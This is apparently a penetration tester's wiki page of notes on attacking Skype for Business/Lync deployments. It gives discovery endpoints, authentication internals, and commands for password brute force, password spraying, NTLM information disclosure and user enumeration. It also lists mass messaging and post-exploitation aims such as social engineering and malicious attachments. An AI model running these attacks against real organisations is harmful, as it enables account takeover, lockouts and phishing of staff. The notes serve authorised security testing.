Lync - CraigDonkin/Infrastructure GitHub Wiki
Some notes on attacking skype for business
- Skype for Busines/Lync/Communicator
- on-premise or Online (Office 365)
Discovery
Most organisations would have DNS such as:
lyncdiscover.example.org (external)
lyncdiscoverinternal.example.org (Internal)
Skype client uses these DNS for autodiscover the location of the server.
- GET request to the autodiscover server will return the location where you can authenticate to
- Password guessing attacks
- Response headers may also contain internal hostname of server
Other Subdomains
- dialin.contoso.com
- scheduler.contoso.com
- meet.contoso.com
Web Login Portals
- https://dialin.contoso.com
- https://lync-fe.controso.com//dialin
- https://scheduler.contoso.com
- https://lync-fe.contoso.com/scheduler
NMAP
Look for HTTPs services where nmap flags as `ssl/sip
NMAP should flag these as Microsoft Lync SIP
Authentication
- NTLM
- Kerberos
- OAuth
NTLM + Kerberos
- Uses the WebTicketService process
- Requires retrieving the WebTicketService URL from the Z-MS-WebTicketURL header using NTLM or Kerberos to make a SAML claim
- If successful a security token is returned that can be used with the X-MS-WebTicket header to impersonate a user
OAuth
- Preferred technique
- Used by LyncSniper
- OAuth cannot be disabled or removed
WWW-Authenticateheader contains the supported authentication methods in the grant_type paramater
grant_type="urn:microsoft.rtc:windows,urn:microsoft.rtc:anonmeeting,password"
The above shows Windows and password authentication supported
- Send a POST request to the URL contained in the WWW-Authenticate heade with the following paramaters to authenticate
grant_type="password";[email protected];password=blah
- If successful access_token will be returned in JSON response.
Office 365 OAuth
- grant_type password not supported
- Authentication is perfromed using Windows Live authentication
- autodiscover service will respond with a host of https://webdir*.online.lync.com
- Authentication performed to static endpoint using WS-Trust and RST
Attacks
Password Brute Force
- Can lock out accounts
- On premise will depend on the AD account lockout policy
- Cloud the lockout is controlled by Microsoft
- 10 attempts lockout
- Increased lockout duration
Invoke-LyncBrute -username [email protected] -passlist blah.list -office365 - verbose
Password Spray
Invoke-LyncSpray -userlist users.txt -password Blah -AutoDiscoverURL -verbose https://lyncdiscover.blah.org
Information Disclosure via NTLM
- NTLM may be enabled on directory
- /abs
- /WebTicket/WebTicketService.svc
- /WebTicket/
- /GroupExpansion
- /CertProv
- /RgsClients
- /RequestHandlerEXT
- /mcx
- Run
nmap -v -Pn -sS -p443 --script=http-ntlm-info -script-args=http-ntlm-info.root=/abs/ dialin.contoso.com
User Enumeration Timing Attack
- Login attempt with VALID username responds faster than an INVALID username or domain
python lyncsmash.py enum -H 2013-lync-fe.contoso.com -U userlist.txt -p password -d CONTOSO
This will cause 1 failed login attempt for every valid userna,e
Tools
https://github.com/mdsecresearch/LyncSniper
https://github.com/nyxgeek/lyncsmash
https://github.com/NetSPI/PowerShell/blob/master/PowerSkype.ps1
PowerSkype
Validate and email and get its status
Get-SkypeStatus -email [email protected]
Validate emails and get statuses - List input
Get-SkypeStatus -inputFile emails.txt | ft -auto
Send a message
Invoke-SendSkypeMessage -email [email protected] -message "Hello World"
Send a message to multiple users
get-content emails.txt | foreach {Invoke-SendSkypeMessage -email $_ -message "Hello World"}
Post Exploitation
- Obtain global address book
- Enumerate employee relationships
- Social Engineer users
- Send malicious attachments
- Monitor targets via user presence
References
https://www.trustedsec.com/2017/08/attacking-self-hosted-skype-businessmicrosoft-lync-installations/
https://www.mdsec.co.uk/2017/04/penetration-testing-skype-for-business-exploiting-the-missing-lync/
https://blog.netspi.com/attacking-federated-skype-powershell/